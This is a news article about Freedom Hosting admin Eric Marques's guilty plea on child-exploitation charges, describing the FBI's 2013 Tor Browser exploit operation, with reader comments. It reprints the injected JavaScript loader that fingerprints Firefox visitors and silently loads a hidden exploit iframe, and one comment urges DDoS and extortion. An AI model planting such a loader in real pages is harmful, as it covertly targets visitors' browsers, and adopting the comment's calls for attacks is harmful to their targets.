Freedom Hosting Admin Admits Child Pornography Charges

Eric Eoin Marques, the creator and administrator of Freedom Hosting, pleaded guilty to conspiracy to advertise child pornography. Freedom Hosting, at its height, was the largest Tor webhost and the FBI called Marques “the largest facilitator of child porn on the planet.”

Marques admitted operating Freedom Hosting from between 2008 and 2013 until his arrest in Dublin, Ireland. Investigators learned that Marques had helped operate “criminal communities dedicated to the sexual exploitation of children.” He was not a “hands off” administrator and actively participated in the child exploitation forums hosted on Freedom Hosting.

Freedom Hosting homepage

Freedom Hosting homepage

Law enforcement in Ireland arrested Marques after a grand jury had returned an indictment charging him with the following crimes:

An example of his active participation and acknowledgement of the illegal forums using Freedom Hosting:

On April 24, 2013, a user of Website A posted a message asking whether the anonymous hosting service (AHS) is free to the end user. On April 25, 2013, the administrator of Website A responded that the AHS is “100% free” and that the administrator assumes that “the admin covers [the cost] himself as a·service to the [Network] pedo community.”

Website A, in this instance, is a reference to one of the largest child exploitation forums at the time. In a similar thread, users of the forum talked about Marques’ additional involvement:

On May 31, 2013, the administrator of Website A replied to a user that claimed, “[AHS] has NO control of the sites it hosts. It only hosts them.” The administrator responded, stating, “In reality [AHS] has full control over all the websites hosted on their servers. In fact, just a few days ago they patched a few of the core files running this very forum.” Later in the same conversation, the administrator noted that, though AHS does not “create or maintain ( as far as I know) any of the sites they are hosting” AHS could “do whatever they wanted with the-sites they host as they inherently have full access to the databases behind the sites.”

Freedom Hosting, in total hosted more than 8.5 million images of child exploitation material, according to an announcement from the Department of Justice. (Marques had little to no involvement in the administration of the majority of the sites hosted by Freedom Hosting. The government focused entirely on child pornography crimes.)

After seizing Freedom Hosting servers, the FBI relaunched the service using servers under their control in Maryland.

FBI describes the operation in the criminal complaint

FBI describes the operation in the criminal complaint

On August 1, 2013, some savvy Tor users began noticing that the Freedom Hosting sites were serving a hidden “iframe”—a kind of website within a website. The iframe contained Javascript code that used a Firefox vulnerability to execute instructions on the victim’s computer. The code specifically targeted the version of Firefox used in the Tor Browser Bundle—the easiest way to use Tor.

— Visit the Wrong Website, and the Fbi Could End Up in Your Computer Kevin Poulsen - wired.com/2014/08/operation-torpedo/

The compromised server injected an iframe and then injected additional iframes with scripts that checked the vistor’s browser version (See CVE-2013-1690 for more information). If a user’s browser version met the requirements (Firefox 17 on Windows), it would download an infected payload that sent the target’s MAC address and Windows hostname to a server in Virginia controlled by the FBI. This exploit required the use of javascript. And the Tor Browser Bundle shipped with javascript enabled by default.

Below is the first indication that something was not right. The full code consists of multiple scripts and is far too long to embed here. Can check it out here though. Magneto

function createCookie(name,value,minutes) {
	if (minutes) {
		var date = new Date();
		date.setTime(date.getTime()+(minutes*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
    	var c = ca[i];
    	while (c.charAt(0)==' ') c = c.substring(1,c.length);
    	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}

function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}

function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
        updatify();
    }
}

function isReady()
{
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {
    
        if ( isFF() ) {
            format_quick();
        }
    }
    else
    {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);

Marques is scheduled for sentencing on May 11, 2020. He faces a mandatory minimum sentence of 15 years in prison.

Previously: DOJ: Freedom Hosting Admin has been Extradited to the US

h/t @just_some_d00d

Comments Closed

WeAreAMSTERDAM

Sick people. Go offline on tor netwerk retards.

bfj

and notihng of value was lost.

Frosty

one more nasty piece of shit hits the bowl

onemoretogo

i hope they catch the squaremarket admin too sick fucks

dnl

can you show a comparison between what a site looks like normal and what a site looks like with iframe?

para

CP aside, Freedom Hosting was a great service

kertlepinginassist

onemoretogo

“i hope the catch the squaremarket admins too sick fucks”

What do you mean? How do know the admins of squaremarket and why are they sick fucks?

Frosty

Didn't know hosting on Freedom Hosting was free. That's cool... not cool CP was how it stayed afloat

Frosty

WeAreAmsterdam is a scammer, unless of course they lost access to email. DO not order from them. Nothing shows.

heykertlepinginassist

squaremarket allowed cp for a long time that is why they were never listed on deepdotweb when it was still around and still not many sites list them

DNL

In reply to heykertlepinginassist

Law enforcement had seized DeepDotWeb long before Square Market launched. The market itself has not existed a “long time” yet.

hairyballs

15 years for this piece of shit is a joke, 150 years would not be long enough. Wish these other pieces of shit who DDOS the fuck out of these markets would target these Pedo Sites, surely they could extort the fuck out of them until they kill themselves, hopefully!

cun0x

whack boy. CP rlly bad.

Klep

These guys need to all GO. It's so disgusting how can you even get off on a young human like they aren't even developed.

fucksquaremarket

sick fucks he got only 15 years wtttttfffff!!!

malz

fuck Ross for life, and he gets 15 years? fuck the American justice system

Chickshaveboobs

Do you guys not know what a mandatory minimum sentence is? 15 years is the MINIMUM he will serve. It’s highly unlikely the judge will give him the lightest sentence. This guys going away for life

scumbag

i just hope i can join these sick fucks in prison